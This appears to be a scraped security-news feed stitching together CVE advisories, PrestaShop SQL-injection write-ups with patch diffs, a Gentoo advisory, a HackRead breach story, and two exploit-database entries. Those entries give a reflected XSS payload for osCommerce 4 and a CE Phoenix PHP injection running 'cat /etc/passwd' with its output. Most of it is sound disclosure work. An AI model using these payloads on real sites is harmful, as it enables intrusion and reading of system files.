Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary
JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.

CVE-2023-49145: Apache NiFi Security Reports

SQL injection vulnerability in PrestaShop opartdevis v.4.5.18 thru v.4.6.12 allows a remote attacker to execute arbitrary code via a crafted script to the getModuleTranslation function.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Opart Devis” (opartdevis) up to version 4.6.12 from Opart for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-48188
*   **Published at**: 2023-11-23
*   **Platform**: PrestaShop
*   **Product**: opartdevis
*   **Impacted release**: >= 4.5.18 & <= 4.6.12 (4.6.13 fixed the vulnerability)
*   **Product author**: Opart
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method Translate::getModuleTranslation() has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop class stappled on all pages and most attackers can conceal the attack during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.6.1**

    --- 4.6.1/modules/opartdevis/override/classes/Translate.php
    +++ 4.6.2/modules/opartdevis/override/classes/Translate.php
    ...
                        LEFT JOIN '._DB_PREFIX_.'customer c ON c.id_customer = a.id_customer 
    -                    WHERE id_opartdevis = '.Tools::getValue('id_opartdevis'));
    +                    WHERE id_opartdevis = '.(int) Tools::getValue('id_opartdevis'));
                        $lang = new Language($id_lang);
    

Do not forget to check the installed override here :

    --- 4.6.1/override/classes/Translate.php
    +++ 4.6.2/override/classes/Translate.php
    ...
                        LEFT JOIN '._DB_PREFIX_.'customer c ON c.id_customer = a.id_customer 
    -                    WHERE id_opartdevis = '.Tools::getValue('id_opartdevis'));
    +                    WHERE id_opartdevis = '.(int) Tools::getValue('id_opartdevis'));
                        $lang = new Language($id_lang);
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **opartdevis**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2022-11-29

Issue discovered during a code review by TouchWeb.fr

2022-11-29

Contact Author to report it but was qualified CVSS 7.2/10 which is currently ignored

2023-10-31

202 ecommerce qualified it critical

2023-10-31

Contact Author again to report that it’s a critical issue and to get version scope

2023-11-08

Author confirms version scope

2023-11-14

Request a CVE ID

2023-11-20

Received CVE ID

2023-11-23

Publish this security advisory

Opart thanks TouchWeb and 202 ecommerce for their courtesy and their help after the vulnerability disclosure.

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-48188: [CVE-2023-48188] Improper neutralization of SQL parameter in Opart Devis for PrestaShop

In the module "Product Catalog (CSV, Excel) Export/Update" (updateproducts) < 3.8.5 from MyPrestaModules for PrestaShop, a guest can perform SQL injection. The method `productsUpdateModel::getExportIds()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Product Catalog (CSV, Excel) Export/Update” (updateproducts) up to version 3.7.6 from MyPrestaModules for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-46349
*   **Published at**: 2023-11-23
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: updateproducts
*   **Impacted release**: <= 3.7.6 (3.8.5 fixed “all” vulnerabilities known - see Note below)
*   **Product author**: MyPrestaModules
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method productsUpdateModel::getExportIds() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

Note : The file which suffer of the critical problem has been partially rewriten to become an admin controller instead of an ajax script so it’s not longer a critical issue since months (<= 3.7.6), only a high severity issue. Author patch all this high severity issue on the version 3.8.5, it’s why we advice to upgrade to this version.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 3.7.6**

    --- 3.7.6/modules/updateproducts/datamodel.php
    +++ XXXXX/modules/updateproducts/datamodel.php
    ...
    if( $selected_manufacturers ){
          $justProducts = false;
          $selected_manufacturers = implode(",", $selected_manufacturers);
    -     $where .= " AND p.id_manufacturer IN (".pSQL($selected_manufacturers).") ";
    +     $where .= " AND p.id_manufacturer IN (".implode(',', array_map('intval', explode(',', $selected_manufacturers))).") ";
        }
    
        if( $selected_suppliers ){
          $justProducts = false;
          $selected_suppliers = implode(",", $selected_suppliers);
    -     $where .= " AND s.id_supplier IN (".pSQL($selected_suppliers).") ";
    +     $where .= " AND p.id_manufacturer IN (".implode(',', array_map('intval', explode(',', $selected_suppliers))).") ";
        }
    
        if( $selected_categories ){
          $justProducts = false;
          $selected_categories = implode(",", $selected_categories);
    -     $where .= " AND cp.id_category IN (".pSQL($selected_categories).") ";
    +     $where .= " AND p.id_manufacturer IN (".implode(',', array_map('intval', explode(',', $selected_categories))).") ";
        }
    
        if( $products_check ){
          $products_check = implode(",", $products_check);
          $justProducts = $justProducts ? 'AND' : 'OR';
    -     $where .= " $justProducts p.id_product IN (".pSQL($products_check).") ";
    +     $where .= " AND p.id_manufacturer IN (".implode(',', array_map('intval', explode(',', $products_check))).") ";
        }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **updateproducts**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-06-03

Issue discovered during a code review by TouchWeb.fr

2023-06-03

Contact PrestaShop Addons security Team to confirm version scope by author

2023-06-09

PrestaShop Addons security Team confirm versions scope by author

2023-08-28

Author provide a patch which fix the remaining high severity issue

2023-10-17

Request a CVE ID

2023-10-23

Received CVE ID

2023-11-23

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-46349: [CVE-2023-46349] Improper neutralization of SQL parameter in MyPrestaModules - Product Catalog (CSV, Excel) Export/Update module for PrestaShop

SQL Injection vulnerability in32ns KLive v.2019-1-19 and before allows a remote attacker to obtain sensitive information via a crafted script to the web/user.php component.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-49030: vulnerability/32ns-KLive-SQL-user.php.md at main · Chiaki2333/vulnerability

By Waqas
According to the threat actor, the data includes "a lot of DARPA-related military information."
This is a post from HackRead.com Read the original post: General Electric Probes Security Breach as Hackers Sell DARPA-Related Access

The security breach was announced by IntelBroker, a threat actor mostly known for data breaches against delivery and logistics companies.

A notorious hacker using the alias ‘IntelBroker’ wants to sell data apparently stolen from renowned US-based multinational corporation General Electric (GE). The hacker is marketing the data on the notorious Breach Forums.

As seen by Hackread.com, the group is claiming to have breached GE’s security and accessed data on the confidential military projects the company was working on. The group’s member is now trying to sell GE’s network access for $500 and sensitive data from DARPA, the US government’s defence R&D agency.

For your information, GE was founded around a century ago by Thomas Edison. Today, it boasts a diverse portfolio covering renewable energy, health care, and aerospace.

IntelBroker posted screenshots on X (formerly Twitter) that indicate that the threat actor is actively marketing the stolen data on popular marketplaces on Clear and Dark Web. The hacker has shared the following information in the listing:

“I previously listed access to General Electrics, but no serious buyers have actually responded to me or followed up. I am now selling the entire thing here separately, including access (SSH, SVN etc.).”

Regarding the data, the seller boasted that it comprises “a lot of DARPA-related military information, files, SQL files, documents etc.”

What the hacker posted on Breach Forums (Screenshot: Hackread.com)

In their post on the hacker forum, the threat actor wrote that they first tried to sell alleged SSH and SVN access to the company’s networks but couldn’t find suitable buyers. They are now re-attempting to sell the data to whoever wants to pay for it.

The data samples they have shared on the forum include SQL database files, aviation systems’ technical descriptions/guides, maintenance reports, and military documents.

Though Hackread.com could not verify the authenticity of the data, considering the hacker’s record, the claim seems credible. The same threat actor had breached the personal information of 170,000 individuals. They offered to sell it on the Dark Web after hacking the DC Health Benefit Exchange Authority (HBX) health insurance marketplace, DC Health Link, in March 2023.

Regarding the current breach, GE is investigating the data breach and will soon release an official statement to share its findings.

It is worth noting that GE has been a victim of data breaches. In 2020, the company lost employee data after a third-party provider, Canon Business Process Services, got hacked. In early 2023, GE’s ex-employee of GE, Xiaoqing Zheng, who worked at GE Power’s Schenectady plant, received a two-year sentence for conspiring to steal aviation trade secrets and sharing them with China.

For your information, the GE data is being sold on Breach Forms, the same forum where, just a couple of weeks ago, another threat actor leaked a scraped LinkedIn database with 35 million user data. Last week, the same forum witnessed the leak of a database containing the personal data of thousands of employees of the Idaho National Lab.

On the other hand, IntelBroker is recognized for targeted cyber attacks against delivery services and logistics companies. This threat actor had previously breached the US-based online grocery delivery platform, Weee!, leading to the leak of data from 1.1 million customers online.

****_RELATED ARTICLES_****

1.  **Military Satellite Access Sold on Russian Hacker Forum**
2.  **Quest Diagnostics data breach affects 12 million customers**
3.  **Top 10 vulnerable airports where your device can be hacked**
4.  **Top US aerospace services provider breach, loses 1.5 TB of data**
5.  **America’s largest diagnostics service LabCorp suffers data breach**

General Electric Probes Security Breach as Hackers Sell DARPA-Related Access

Cross Site Scripting vulnerability in smpn1smg absis v.2017-10-19 and before allows a remote attacker to execute arbitrary code via the nama parameter in the lock/lock.php file.

**absis**

Sistem Akademik KTSP/K13

Versi 0.000001 (yang mudeng cuman developernya aja)

Masih Versi Alpha, banyak bug sana-sini dan kode yang tidak rapi. Next Version -> Sudah menggunakan framework laravel

Step:

1.  Upload data backend di server php anda.
2.  Ada 2 database yg harus anda gunakan, yaitu master dan \[tiap tahun ajaran\] (https://github.com/smpn1smg/absis/smpn1smg\_2015.sql). Yang kami berikan berupa data dummy, agar bisa digunakan. Di github.com/smpn1smg/absis.
3.  Setting agar sistem ada di root (misal langsung di http://localhost/ bukan di http://localhost/absis/
4.  Setting username dan password MySQL di controller/config/config.php dan model/class/master.php

Login demo: demo.absis.co.id username: demo pass: demo

Daftar Fitur (baik yg sudah dan yg akan):

**Lisensi**

  
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.

Hal ini berarti:

*   **Share**: Anda bebas untuk menggunakan dan mendistribusikan materi-materi ini pada media dan bentuk apapun.
*   **Adapt**: Anda bebas untuk memodifikasi materi-materi ini pada penggunaannya.

Dengan ketentuan sebagai berikut:

*   **Attribution**: Apabila Anda menggunakan materi-materi ini, Anda harus memberikan _credit_ kepada **SMPN 1 Semarang**.
*   **NonCommercial**: Anda tidak boleh menggunakan materi-materi ini untuk keperluan komersial.
*   **ShareAlike**: Apabila Anda memodifikasi materi-materi ini, Anda harus mendistribusikannya kembali dengan lisensi yang sama. Hal ini dapat dilakukan dengan cara melakukan _fork_ repositori ini dan melakukan _commit_ modifikasi-modifikasi yang Anda lakukan di sana.

Untuk penjelasan lebih lanjut mengenai lisensi ini, silakan membuka tautan lisensi di atas.

CVE-2023-49029: GitHub - smpn1smg/absis: Sistem Akademik K13/KTSP Berbasis Web

osCommerce version 4 suffers from a cross site scripting vulnerability.

    # Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: CraCkEr# Date: 13/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/printshop/# Tested on: Windows 11 Home# Impact: Manipulate the content of the site# CWE: CWE-79 - CWE-74 - CWE-707# CVE: CVE-2023-6296## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /catalog/compareGET parameter 'compare[]' is vulnerable to XSShttps://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx[-] Done

osCommerce 4 Cross Site Scripting

Gentoo Linux Security Advisory 202311-17 - Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service. Versions greater than or equal to 5.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: phpMyAdmin: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #831841, #835071  
       ID: 202311-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in phpMyAdmin, the worst  
of which allows for denial of service.

Background  
=========  
phpMyAdmin is a tool written in PHP intended to handle the  
administration of MySQL over the web.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-db/phpmyadmin  < 5.2.0       >= 5.2.0

Description  
==========  
Multiple vulnerabilities have been discovered in phpMyAdmin. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All phpMyAdmin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/phpmyadmin-5.2.0"

References  
=========  
[ 1 ] CVE-2022-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0813  
[ 2 ] CVE-2022-23807  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23807  
[ 3 ] CVE-2022-23808  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23808

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-17

CE Phoenix version 1.0.8.20 suffers from an authenticated remote command execution vulnerability.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)### POC:<img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000">1. **Login to admin panel:**     - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`    2. **Access english.php:**    - Click on `english.php` and inject the payload:     ```    <?php echo system('cat /etc/passwd'); ?>    ```    3. **Save Changes:**    - Save the modified file.4. **View Results:**    - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`    - You will see the following result:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:998:997:User for polkitd:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:997:995::/var/lib/chrony:/sbin/nologinsoft:x:1000:1000::/home/soft:/sbin/nologinsaslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinemps:x:995:1001::/home/emps:/bin/bashnamed:x:25:25:Named:/var/named:/sbin/nologinexim:x:93:93::/var/spool/exim:/sbin/nologinvmail:x:5000:5000::/var/local/vmail:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falsewebuzo:x:993:993::/home/webuzo:/bin/bashapache:x:992:991::/home/apache:/sbin/nologinapache:x:992:991::/home/apache:/sbin/nologin

CE Phoenix 1.0.8.20 Remote Command Execution

Improper authorization check and possible privilege escalation on Apache Superset up to but excluding 2.1.2. Using the default examples database connection that allows access to both the examples schema and Apache Superset's metadata database, an attacker using a specially crafted CTE SQL statement could change data on the metadata database. This weakness could result on tampering with the authentication/authorization data.



**Apache Superset - Elevation of Privilege**

Moderate severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

Tag

#sql